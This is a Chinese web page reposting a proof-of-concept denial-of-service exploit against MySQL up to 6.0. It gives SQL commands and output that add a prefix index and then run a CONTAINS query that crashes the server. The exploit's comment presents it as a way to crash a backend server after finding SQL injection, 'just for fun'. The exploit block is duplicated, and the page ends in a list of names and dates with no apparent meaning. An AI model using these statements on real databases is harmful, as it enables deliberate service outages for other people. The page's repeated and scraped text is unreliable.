mysql 5.0.45 (修改)拒绝服务漏洞
mysql 5.0.45 (修改)拒绝服务漏洞
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip> 您可能感兴趣的文章:最新MySQL数据库漏洞情况通报mysql5 注入漏洞MySQL曝中间人攻击Riddle漏洞可致用户名密码泄露的处理方法
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo, ''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip> 您可能感兴趣的文章:最新MySQL数据库漏洞情况通报mysql5 注入漏洞MySQL曝中间人攻击Riddle漏洞可致用户名密码泄露的处理方法
相关文章
Tawnie
2020-05-21
Olathe
2023-07-20
Talia
2023-07-20
Serafina
2023-07-20
Hazel
2023-07-20
Ebony
2023-07-20
Olga
2023-07-20
Elizabeth
2023-07-20
Ianthe
2023-07-20
Valora
2023-07-20
Phemia
2023-07-20
Tia
2023-07-20
Summer
2023-07-20
Fredrica
2023-07-20
Maha
2023-07-21
Edie
2023-07-21
Bonnie
2023-07-21
Ilona
2023-07-22